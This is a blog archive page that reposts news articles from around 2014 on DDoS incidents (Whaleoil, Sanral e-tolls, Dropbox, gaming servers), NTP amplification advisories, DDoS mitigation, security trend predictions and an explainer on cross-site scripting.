Tag Archives: rights

Whaleoil down due to DDOS attack

Controversial right wing website, Whaleoil, has been taken offline by a cyber attack and its editor has received death threats after he labelled a West Coast man killed in a car crash “feral”. A denial of service (DOS) attack started last night, temporarily disabling the blog, and continued today, the website left completely unavailable since 8am. “We are pretty certain it is from New Zealand. We are also pretty certain, due to the fact that they are skiting about it on Facebook, that it is these ferals on the West Coast,” Whaleoil’s editor Cameron Slater said. A DOS attack is intended to block a website from its intended users by overloading the site with requests so it cannot be visited by legitimate traffic. Slater has also received numerous death threats in text messages and on Facebook after a blog in which he described Westcoast man Judd Hall who died on Saturday as a “feral” was reportered in the Greymouth Star. “They are pretty hot under the collar. I wrote a post about that munter who died smacking into that house and a Greymouth Star journalist beat it all up and that set them off in their feral ways,” Slater said. He posted one of the text message threats to his Facebook page that said “we are coming for you” and “we know where you live.” There have been around 250 Facebook messages “imploring me to kill myself or that they are going to come round and kill me in lots of different manners,” Slater said. The threats have been reported to police. It was initially believed that the DOS attack was from the sub-continent after another blog on the site revealed India web traffic to the news site Scoop. “Now with the gloating that is going on from the West Coast ferals we are pretty certain it is them that are involved in it,” Slater said. The website should be back online shortly but the DOS attack has left Slater without a large amount of advertising income. “I don’t discuss my revenues. It is basically a day and a half of revenue,” he said. A DOS attack is illegal under the Crimes Act and is punishable with up to seven years in prison. Source: http://www.stuff.co.nz/technology/digital-living/30013080/whaleoil-down-due-to-dos-attack

See more here:
Whaleoil down due to DDOS attack

Education sector is fastest growing for DDoS mitigation

The education sector is the fastest growing segment in taking up distributed denial of service (DDoS) mitigation, according to DDoS protection services firm DOSarrest. The firm’s CTO Jag Bains told Computing that many companies -not just e-commerce firms – are deploying DDoS protection. “If their website goes down as a result of an attack, they can lose their SEO ranking or it could have an effect on their brand, there is a lot at stake aside from revenues,” he said. And despite there not being a particular industry that looks at DDoS protection as a must, DOSarrest’s general manager, Mark Teolis claimed that the education sector is one area which has grown significantly. “Our fastest growing segment in the last six months is the education sector believe it or not,” he said. Teolis explained that the firm was getting business from “schools from the UK, the US and international universities” but said he couldn’t identify a specific reason as to why the sector has shown a sudden interest. Bains believes that it may be as a result of educational institutes guarding themselves against their own students. “Students have easy access to DDoS tools, so they may want to try it against their own [school or university]. They could be motivated because they’re failing in something, and there are enough smart kids around to access tools – it is easy to Google them anyway,” he said. But Teolis said that the tools have been available on the internet for a long time, so questioned why there was a sudden surge in interest from educational institutes. Bains suggested that it could be because the school and university websites have become an integral part of the education system. “We’ve been talking about e-commerce and gaming [as being key industries for DDoS protection], but web presence itself is very important and schools and universities need to make their websites accessible. They need a website to give out grades, information and schedules – five years ago they weren’t really using the web page apart from explaining where the school is located,” he said. But while the education sector may be taking a keen interest, Teolis claims that there is not one segment that is “taking up 30 per cent of the market”. He said that “10 or 15 per cent of the market is as good as it gets”. As for a particular industry that has not taken DDoS as seriously as others, Teolis believes many e-commerce firms haven’t contemplated being the victim of a DDoS attack. “There are still the odd e-commerce guys out there [who haven’t taken it as seriously]. Money is rolling in and they’re just focused on that; DDoS for them is somebody else’s problem. A lot of it is ‘my ISP will deal with it’, the fact of the matter is, it is difficult to stop all of the attacks,” he said. Source: http://www.computing.co.uk/ctg/news/2325009/education-sector-is-fastest-growing-for-ddos-mitigation-dosarrest

See the original article here:
Education sector is fastest growing for DDoS mitigation

E-toll site weathers denial of service (DDoS) attack

Sanral’s e-toll Web site suffered a denial of service (DoS) attack on Friday, according to the agency. “Some users complained of slow site performance, and our service provider traced the problem to a denial of service attack of international origin,” said Sanral spokesman Vusi Mona. No further details of the attack were available, but Alex van Niekerk, project manager for the Gauteng Freeway Improvement Project, said the site has come under repeated attack since going live, but suffered only minor performance degradation. DoS attacks, particularly distributed denial of service (DDoS) attacks, are a popular technique used to knock sites offline, overwhelming them with traffic until they are unable to service their clients. Activist group Anonymous frequently uses DDoS to attack targets, using its wide base of supporters to generate traffic. Botnets often launch DDoS attacks from their installed base of zombie PCs. And last year, anti-spam service Spamhaus suffered one of the largest DDoS attacks in history, with incoming traffic peaking at 300Gbps, launched by a Dutch Web host known for harbouring spammers. Sanral’s Web site has been the target of several attacks lately, including a hack which may have leaked personal information, a flaw which allowed motorists to be tracked in real-time, and a session fixation attack which allowed login sessions to be hijacked. Source: http://www.itweb.co.za/index.php?option=com_content&view=article&id=70192:e-toll-site-weathers-denial-of-service-attack

See more here:
E-toll site weathers denial of service (DDoS) attack

DDoS attacks get more complex – are networks prepared?

The threat of cyber attacks from both external and internal sources is growing daily. A denial of service, or DoS, attack is one of the most common. DoS have plagued defense, civilian and commercial networks over the years, but the way they are carried out is growing in complexity. If you thought your systems were engineered to defend against a DoS attack, you may want to take another look.   Denial of service attack evolution A denial of service attack is a battle for computing resources between legitimate requests that a network and application infrastructure were designed for and illegitimate requests coming in solely to hinder the service provided or shut down the service altogether.   The first DoS attacks were primarily aimed at Layer 3 or Layer 4 of the OSI model and were designed to consume all available bandwidth, crash the system being attacked, or consume all of the available memory, connections or processing power. Some examples of these types of attacks are the Ping of Death, Teardrop, SYN flood and ICMP flood. As operating system developers, hardware vendors and network architects began to mitigate these attacks, attackers have had to adapt and discover new methods. This has led to an increase in complexity and diversity in the attacks that have been used.   Since DoS attacks require a high volume of traffic — typically more than a single machine can generate — attackers may use a botnet, which is a network of computers that are under the control of the attacker. These devices are likely to have been subverted through malicious means. This type of DoS, called a distributed denial of service (DDoS), is harder to defend against because the traffic likely will be coming from many directions.   While the goal of newer DoS attacks is the same as older attacks, the newer attacks are much more likely to be an application layer attack launched against higher level protocols such as HTTP or the Domain Name System. Application layer attacks are a natural progression for several reasons: 1) lower level attacks were well known and system architects knew how to defend against them; 2) few mechanisms, if any, were available to defend against these types of attacks; and 3) data at a higher layer is much more expensive to process, thus utilizing more computing resources.   As attacks go up the OSI stack and deeper into the application, they generally become harder to detect. This equates to these attacks being more expensive, in terms of computing resources, to defend against. If the attack is more expensive to defend against, it is more likely to cause a denial of service. More recently, attackers have been combining several DDoS attack types. For instance, an L3/L4 attack, in combination with an application layer attack, is referred to as diverse distributed denial of service or 3DoS. Internet and bandwidth growth impact DoS   Back in the mid- to late 1990s, fewer computers existed on the Internet. Connections to the Internet and other networks were smaller and not much existed in the way of security awareness. Attackers generally had less bandwidth to the Internet, but so did organizations.   Fast forward to the present and it’s not uncommon for a home connection to have 100 megabits per second of available bandwidth to the Internet. These faster connections give attackers the ability to send more data during an attack from a single device. The Internet has also become more sensitive to privacy and security, which has lead to encryption technologies such as Secure Sockets Layer/Transport Layer Security to encrypt data transmitted across a network. While the data can be transported with confidence, the trade-off is that encrypted traffic requires extra processing power, which means a device encrypting traffic typically will be under a greater load and, therefore, will be unable to process as many requests, leaving the device more susceptible to a DoS attack.   Protection against DoS attacks   As mentioned previously, DoS attacks are not simply a network issue; they are an issue for the entire enterprise. When building or upgrading an infrastructure, architects should consider current traffic and future growth. They should also have resources in place to anticipate having a DoS attack launched against their infrastructure, thereby creating a more resilient infrastructure.   A more resilient infrastructure does not always mean buying bigger iron. Resiliency and higher availability can be achieved by spreading the load across multiple devices using dedicated hardware Application Delivery Controllers (ADCs). Hardware ADCs evenly distribute the load across all types of devices, thus providing a more resilient infrastructure and also offer many offloading capabilities for technologies such as SSL and compression.   When choosing a device, architects should consider whether the device offloads some processing to dedicated hardware. When a typical server is purchased, it has a general purpose processor to handle all computing tasks. More specialized hardware such as firewalls and Active Directory Certificates offer dedicated hardware for protection against SYN floods and SSL offload. This typically allows for such devices to handle exponentially more traffic, which in turn means they are more capable to thwart an attack. Since attacks are spread across multiple levels of the OSI model, tiered protection is needed all the way from the network up to the application design. This typically equates to L3/L4 firewalls being close to the edge that they are protecting against some of the more traditional DoS attacks and more specialized defense mechanism for application layer traffic such as Web Application Firewalls (WAFs) to protect Web applications. WAFs can be a vital ally in protecting a Web infrastructure by defending against various types of malicious attacks, including DoS. As such, WAFs fill in an important void in Web application intelligence left behind by L3/L4 firewalls.   As demonstrated, many types of DoS attacks are possible and can be generated from many different angles. DoS attacks will continue to evolve at the same — often uncomfortably fast — rate as our use of technology. Understanding how these two evolutions are tied together will help network and application architects be vigilant and better weigh the options at their disposal to protect their infrastructure. Source: http://defensesystems.com/Articles/2013/12/19/DOS-attacks-complexity.aspx?admgarea=DS&Page=3

Continue reading here:
DDoS attacks get more complex – are networks prepared?

Mobile devices increasingly used to launch sophisticated DDoS attacks

DDoS attacks still plague businesses worldwide, and cyber criminals are increasingly using mobile devices to launch attacks The threat of distributed denial of service (DDoS) attacks against enterprise users from mobile applications is increasing as more users go mobile, according to DDoS security company Prolexic. Cyber criminals are finding mobile devices can make for a powerful attack tool – and surprisingly easy to use. “Mobile devices add another layer of complexity,” said Stuart Scholly, Prolexic President, in a press statement. “Because mobile networks use super proxies, you cannot simply use a hardware appliance to block source IP addresses as it will also block legitimate traffic. Effective DDoS mitigation requires an additional level of fingerprinting and human expertise so specific blocking signatures can be developed on-the-fly and applied in real-time.”   DDoS attacks can lead to website and server downtime, interruption in day-to-day business operations, and lead to lost revenue and wasted manpower. Prolexic discovered a 26 percent increase in DDoS attacks from Q4 2012 to Q4 2013, with a significant number of advanced DDoS attack weapons. Source: http://www.tweaktown.com/news/34862/mobile-devices-increasingly-used-to-launch-sophisticated-ddos-attacks/index.html

Read more here:
Mobile devices increasingly used to launch sophisticated DDoS attacks

US-CERT warns of NTP Amplification attacks

US-CERT has issued an advisory that warns enterprises about distributed denial of service attacks flooding networks with massive amounts of UDP traffic using publicly available network time protocol (NTP) servers. Known as NTP amplification attacks, hackers are exploiting something known as the monlist feature in NTP servers, also known as MON_GETLIST, which returns the IP address of the last 600 machines interacting with an NTP server. Monlists is a classic set-and-forget feature and is used generally to sync clocks between servers and computers. The protocol is vulnerable to hackers making forged REQ_MON_GETLIST requests enabling traffic amplification. “This response is much bigger than the request sent making it ideal for an amplification attack,” said John Graham-Cumming of Cloudflare. According to US-CERT, the MON_GETLIST command allows admins to query NTP servers for traffic counts. Attackers are sending this command to vulnerable NTP servers with the source address spoofed as the victim. “Due to the spoofed source address, when the NTP server sends the response it is sent instead to the victim. Because the size of the response is typically considerably larger than the request, the attacker is able to amplify the volume of traffic directed at the victim,” the US-CERT advisory says. “Additionally, because the responses are legitimate data coming from valid servers, it is especially difficult to block these types of attacks.” To mitigate these attacks, US-CERT advises disabling the monlist or upgrade to NTP version 4.2.7, which also disables monlist. NTP amplification attacks have been blamed for recent DDoS attacks against popular online games such as League of Legends, Battle.net and others. Ars Technica today reported that the gaming servers were hit with up to 100 Gbps of UDP traffic. Similar traffic amounts were used to take down American banks and financial institutions last year in allegedly politically motivated attacks. “Unfortunately, the simple UDP-based NTP protocol is prone to amplification attacks because it will reply to a packet with a spoofed source IP address and because at least one of its built-in commands will send a long reply to a short request,” Graham-Cumming said. “That makes it ideal as a DDoS tool.” Graham-Cumming added that an attacker who retrieves a list of open NTP servers, which can be located online using available Metasploit or Nmap modules that will find NTP servers that support monlist. Graham-Cumming demonstrated an example of the type of amplification possible in such an attack. He used the MON_GETLIST command on a NTP server, sending a request packet 234 bytes long. He said the response was split across 10 packets and was 4,460 bytes long. “That’s an amplification factor of 19x and because the response is sent in many packets an attack using this would consume a large amount of bandwidth and have a high packet rate,” Graham-Cumming said. “This particular NTP server only had 55 addresses to tell me about. Each response packet contains 6 addresses (with one short packet at the end), so a busy server that responded with the maximum 600 addresses would send 100 packets for a total of over 48k in response to just 234 bytes. That’s an amplification factor of 206x!” Source: http://threatpost.com/us-cert-warns-of-ntp-amplification-attacks/103573

View the original here:
US-CERT warns of NTP Amplification attacks

Dropbox hits by DDoS attack, but user data safe; The 1775 Sec claims responsibility

Dropbox website went offline last night with a hacking collecting calling itself The 1775 Sec claiming responsibility of the attack on the cloud storage company’s website. The 1775 Sec took to twitter just a few moments before Dropbox went down on Friday night claiming that they were responsible. “BREAKING NEWS: We have just compromised the @Dropbox Website http://www.dropbox.com #hacked #compromised” tweeted The 1775 Sec. This tweet was followed by a another one wherein the group claimed that it was giving Dropbox the time to fix their vulnerabilities and if they fail to do so, they should expect a Database leak. The group claimed that the hack was in honour of Aaron Swartz. Dropbox’s status page at the time acknowledged that there was a downtime and that they were ‘experiencing issues’. The hackers then revealed that their claims of a Database leak was a hoax. “Laughing our asses off: We DDoS attacked #DropBox. The site was down how exactly were we suppose to get the Database? Lulz” tweeted The 1775 Sec. The group claimed that they only launched a DDoS attack and didn’t breach Dropbox security and didn’t have access to Dropbox user data. Dropbox claimed that its website was down because of issues during “routine maintenance” rather than a malicious attack. In a statement Dropbox said “We have identified the cause, which was the result of an issue that arose during routine internal maintenance, and are working to fix this as soon as possible… We apologize for any inconvenience.” Just over an hour ago, Dropbox said that its site was back up. “Dropbox site is back up! Claims of leaked user info are a hoax. The outage was caused during internal maintenance. Thanks for your patience!” read the tweet from Dropbox. Source: http://www.techienews.co.uk/974664/dropbox-hits-ddos-user-data-safe-1775-sec-claims-responsibility/

Read More:
Dropbox hits by DDoS attack, but user data safe; The 1775 Sec claims responsibility

The 2014 cyber security roadmap

The burgeoning Internet of Things and smart devices 2014 is likely to be the year that many industries start to cash in on the much-hyped benefits of smart connected devices. But as more devices become IP-enabled, they contribute to the pool of things that can be recruited into botnets or other platforms used for distributed attacks – something which most companies are currently not prepared for, warns Mike Foreman, general manager of security software firm AVG Technologies. ‘Distributing attacks via unmanned smart devices helps make it more difficult to trace the source and easier to overwhelm the target,’ says Foreman. In order to meet the challenge of securely managing hundreds of millions of connected devices and securing the data transmitted between them, Jason Hart, VP of cloud solutions at security specialist SafeNet , says that organisations will need public key infrastructure solutions that combine comprehensive security with scalability and reliability. ‘PKIs, simply put, use digital certificates that can be embedded within devices, giving them the authorisation needed to access different networks,’ explains Hart. BYOD convenience vs. security Companies will need to adopt new tactics to tackle the increasing drawbacks of a BYOD environment, changing their focus from the devices themselves. When it comes to effective device management, says Chris Wysopal, co-founder and chief information security officer of application security expert Veracode , apps, not devices, are the real problem. ‘Companies need to look for MDMs that understand what apps are installed across corporate and BYOD devices, and the risk associated with those applications,’ he advises. Jonathan Foulkes of systems management software firm Kaseya thinks businesses will need to shift the focus away from devices and onto securing and managing data. ‘By “containerising” corporate data and only providing access through secure applications, IT is given full control over policies and the ability to decide which users – rather than devices – are allowed to connect to what data and with what application.’ The true security risks of cloud computing beginning to emerge The horse has left the barn for IT teams dealing with the cloud. Business units are demanding it and building apps there if their IT departments will not – and this is a trend that is set to continue in 2014 as adoption of core applications in the cloud grows. ‘This opens up application change errors that can be totally missed by the security team,’ warns Reuven Harrison, CTO of security policy orchestration company Tufin . ‘It also increases silos and puts the business network at great risk by bypassing traditional IT structures.’ Veracode’s Chris Wysopal stresses that cloud apps will need to follow the same application security practices that the organisation requires for internally built apps, while moving towards end-to-end automation of network changes should free up time to concentrate on monitoring all areas of the network. Controlling the privileged user Without a doubt, one of the biggest mistakes that organisations make is having insufficient control and oversight of the actions of ‘privileged users’, says Paul Ayers, VP EMEA of security firm Vormetric . ‘In 2014, after the Snowden leaks and other high-profile insider threats and data breaches, I expect organisations to increasingly put in place the security procedures and tools that allow them to audit and control the actions of these users,’ he comments. The effects of cyber war and cyber espionage Cyber is the new battlefield, and the fifth element of warfare, with states already pouring a huge range of resources into both defensive and offences capabilities. ‘Within the next couple of years, we will experience an increasing number of cyber attacks resulting in militaristic and economic damage,’ says Jarno Limnell, director of cyber security at McAfee Group security vendor Stonesoft . Rik Ferguson, VP of security research at security vendor Trend Micro , notes that the PRISM revelations will increasingly lead cyber criminals to turn to ‘darknets’ – a class of networks, such as The Onion Router (TOR), that guarantee anonymous and untraceable online access. ‘Law enforcement agencies may not have enough knowledge or experience to deal with cyber crime and will have a hard time tracking criminals in the Deep Web, prompting more investment in the fight against cyber crime,’ he says. Strengthened government agenda on cyber security and new compliance standards Over 2013-14, the UK cabinet office will have invested £180 million in cyber security, increasing this amount to £210 million in 2014-15. The government has announced its intention to back a new kite-mark standard for cyber security, with further details promised early this year. Around the same time, the European Commission will unveil a new directive on data privacy. ‘But while these measures are to be welcomed, organisations will have their work cut out preparing themselves to achieve compliance,’ says Alan Calder, founder of cyber security services provider IT Governance . ‘Add to these changes the multiple compliance challenges arising from recent updates of standards, such as ISO 27001 and PCI DSS, and you quickly have a considerable governance task in terms of planning, resourcing and training.’ The security skills gap The world faces an acute shortage of cyber security professionals who are adequately skilled for today’s threat landscape. According to Alan Calder of IT Governance, in 2014 we will feel the effects of this shortfall more than ever, resulting in yet more spectacular data breaches, as it will be several uncomfortable years before supply meets demand. ‘Large accountancy and professional services firms are, at the moment, heavily investing in IT security talent, which means that SMEs will struggle to compete for the best talent, putting the future of their businesses at risk,’ says Christian Toon, risk and security expert at data protection company Iron Mountain . Toon urges that when recruiting IT security professionals, companies should remember that it’s important to get someone who understands not just the technicalities of the job, but also the psychology of both the individuals they are helping to protect and of the cyber criminals who are attempting to steal information from the business. The ever-increasing sophistication of DDoS attacks The transparency shown by RBS in admitting that it failed to invest properly in its IT systems after DDoS attacks in 2013 is a common refrain amongst many enterprises, large and small. But, says Jag Bains, CTO of DDoS attack prevention firm DOSarrest Internet Security , ‘While each organisation may have multiple reasons for failing to invest, they all share the same notion that they won’t be a target – until they get attacked.’ With DDoS tools becoming more advanced and pervasive, Bains warns that all IT operations should work under the premise that they will be attacked, and so plan accordingly. ‘Every stack and layer within their purview should be reviewed, and they should identify cost-effective cloud solutions for their DDoS, which provide much better performance and mitigation than expensive hardware.’ Catherine Pearce, security consultant at mobile security firm Neohapsis , predicts that DDoS attackers will accelerate a move from simple volumetric attacks to those that take advantage of a site’s specific performance, with the spread of tools that profile specific targets and attack based upon certain weaknesses in configuration or implementation. Smarter analytics to combat cyber threats Martin Borrett, director at the IBM Institute for Advanced Security , believes that analytics will become a vital element in countering new threats, aided by advancements in machine learning algorithms that will further improve data and analytics technologies. ‘Security systems will greatly benefit from real-time correlation across massive structured data, such as security device alerts, operating system logs, DNS transactions and network flows, as well as unstructured data, such as emails, social media content, packet info and business transactions,’ says Borrett. ’Organisations can begin along this path by surveying the additional new data sources available and considering which could be used to improve their security analysis outcomes.’ However, each data source may bring its own challenges, such as the volume, velocity, variety and veracity of data, so it will be important for a business to consider also which skills and tools they have available to manage these issues. Challenges regarding authentication technologies such as 2-factor and biometric ‘With companies slowly adopting BYOD programmes, on-premise software still reigning supreme in many IT environments and big hacking attacks occurring every few weeks, there’s no question that the business world still lags in adopting people-centric technologies across workforces,’ says Phil Turner, VP EMEA at identity management company Okta . ‘As a result, in 2014, as businesses have added more applications and the proliferation of devices in the workplace continues to increase, we are likely to see significant growth in cloud-based identity and asset management (IAM) services that can deliver single sign-on across all applications.’ However, looking forward to the end of 2014, we can expect this to start to change. Multi-factor authentication (MFA) – which requires two or more factors to verify the legitimacy of the user – has taken off and evolved pretty substantially in the past decade. And authentication methodologies are becoming as personalised and specific to the individual as the experiences that they’re trying to access. ‘Customers’ expectations for seamless trusted authentication and the continued dominance of smartphones and smart devices will accelerate the move from legacy hardware one-time password tokens to mobile-friendly, embedded security and contextual access controls,’ says SafeNet’s Jason Hart. ‘We can already see early examples such as Apple’s iTouch of biometric authentication, and investments by vendors such as Samsung to bake enterprise-grade security controls into their KNOX platform.’ Cyber resilience, not cyber security In 2014, we will see savvier organisations relinquish futile hopes of ‘cyber security’ for a more pragmatic drive for ‘cyber resilience’. ‘We are living permanently with an irreducible level of cyber threat,’ says IT Governance’s Alan Calder. ‘As this realisation sinks in, organisations must adapt their strategies to avoid unhelpful restrictions on staff mobility and internet access, while ensuring their ability to recover swiftly when attacks take place.’ Jason Hart of SafeNet reiterates that in the coming year we can expect to see companies move away from the traditional strategy of focusing on breach prevention, and towards a ‘secure breach’ approach. ‘This means accepting that breaches happen and using best practice data protection to guarantee that data is effectively useless when it falls into unauthorised hands,’ he says. ‘So, we can expect to see an increase in the use of encryption that renders any data useless to an unauthorised party.’ Source: http://www.information-age.com/technology/security/123457584/the-2014-cyber-security-roadmap

See original article:
The 2014 cyber security roadmap

How EA, League of Legends & Battle.net Were Brought Down By DDoS Attacks

Last week, a group calling themselves DERP launched DDoS attacks on the servers of a number of the world’s biggest games (and games companies). It seemed like an awfully big list of victims for such a simple and ancient form of attack, but as Ars Technica explain, there was a bit more to it than that. Unlike a standard DDoS attack, which big services like Battle.net and League of Legends would have been able to defeat, the attackers used a new – and obviously incredibly effective – method. “Rather than directly flooding the targeted services with torrents of data”, Ars explains, “an attack group calling itself DERP Trolling sent much smaller sized data requests to time-synchronization servers running the Network Time Protocol (NTP). By manipulating the requests to make them appear as if they originated from one of the gaming sites, the attackers were able to vastly amplify the firepower at their disposal. A spoofed request containing eight bytes will typically result in a 468-byte response to a victim, a more than 58-fold increase.” According to “DoS-mitigation service” Black Lotus, while this sounds bad, it’s easy to protect against. Though, they would say that, wouldn’t they. Source: http://kotaku.com/how-ea-league-of-legends-battle-net-were-brought-dow-1498272633

Original post:
How EA, League of Legends & Battle.net Were Brought Down By DDoS Attacks

Could Cross-site scripting (XSS) be the chink in your website’s armour?

Sean Power, security operations manager for DOSarrest Internet Security , gives his advice on how businesses that rely heavily on their web presences can avoid (inadvertently) making their users susceptible to malicious attackers. Cross-site scripting, otherwise commonly known as XSS, is a popular attack vector and gets its fair share of the limelight in the press, but why is it such a problem and how is it caused? Essentially, XSS is a code vulnerability in a website that allows an attacker to inject malicious client-side scripts into a web page viewed by a visitor. When you visit a site that has been compromised by a XSS attack, you will be inadvertently executing the attacker’s program in addition to viewing the website. This code could be downloading malware, copying your personal information, or using your computer to perpetuate further attacks. Of course, most people don’t look at the scripting details on the website, but with popular wikis and web 2.0 content that is constantly updated and changed, it’s important to understand the ramifications from a security stand point. In order for modern websites to be interactive, they require a high degree of input from the user, this can be a place for attackers to inject content that will download malware to a visitor or enslave their computer, and therefore it is hard to monitor an ‘open’ area of the website and continually update and review their websites. XSS code can appear on the web page, in banner ads, even as part of the URL; and if it’s a site that is visited regularly, users will as good as submit themselves to the attacker.  In addition, as XSS is code that runs on the client side, it has access to anything that the JavaScript has access to on the browser, such as cookies that store information about browsing history. One of the real concerns about XSS is that by downloading script on a client-side computer, that endpoint can become enslaved into a botnet, or group of computers that have been infected with malware in order to allow a third party to control them, and used to participate in denial of service attacks. Users might not even be aware that they are part of an attack. In a recent case, we identified how a popular denial of service engine called ‘JSLOIC’ was used as script in a popular website, making any visitor an unwitting participant in a denial of service attack against a third party for as long as that browser window remained open. The range of what can be accomplished is huge- malware can be inserted into a legitimate website, turning it into a watering hole that can infect a visitor’s computer; and this can impact anyone. Once the XSS is put into a website, then the user becomes a victim and the attacker has is all of information that the browser has. In terms of preventing it; firstly, the hole in the website that has been exploited has to be closed.  The main tactic to prevent XSS code running on your website is to make sure you are ‘locking all the doors’ and reviewing your website code regularly to remove bugs and any vulnerabilities. If you are doing it properly, it should be a continual process. If a website has malware on it due to the owner not reviewing it regularly, then attackers will be able alter the malicious code to dominate the page and infect more visitors. You can limit the chances of getting malicious code on your website by routinely auditing the website for unintended JavaScript inclusions. But with XSS, especially non-persistent XSS, the best thing is to validate all data coming in, don’t include any supporting language and make sure what is coming in is sanitised, or checked for malicious code. This is especially true for parts of your website that get regular updates, like comment sections. It is not enough to just assume that because it clean before, new updates will also be also be clear. Even if you are following proper security coding and go through code reviews, websites are sometimes up for six months with no changes made, that is why vulnerability testing is important as new bugs come up. Remember, HTTP and HTML are full of potential vulnerabilities as the HTML protocol was written in the 1960s; it was never imagined it to be what it has become. So when writing website code, if you do not consider SQL Injection or XSS, then you will write a website full of holes. Top three tips: – Review your website and sanitise your code regularly to ensure there is no malicious code or holes where code can be inserted. – Consider not allowing comments to host external links, or even approve those links before they are published to prevent  code from being inserted easily. – View your web traffic in and out of your website for signs of unusual behaviour. Source: http://www.information-age.com/technology/security/123457575/could-xss-be-the-chink-in-your-website-s-armour-

See original article:
Could Cross-site scripting (XSS) be the chink in your website’s armour?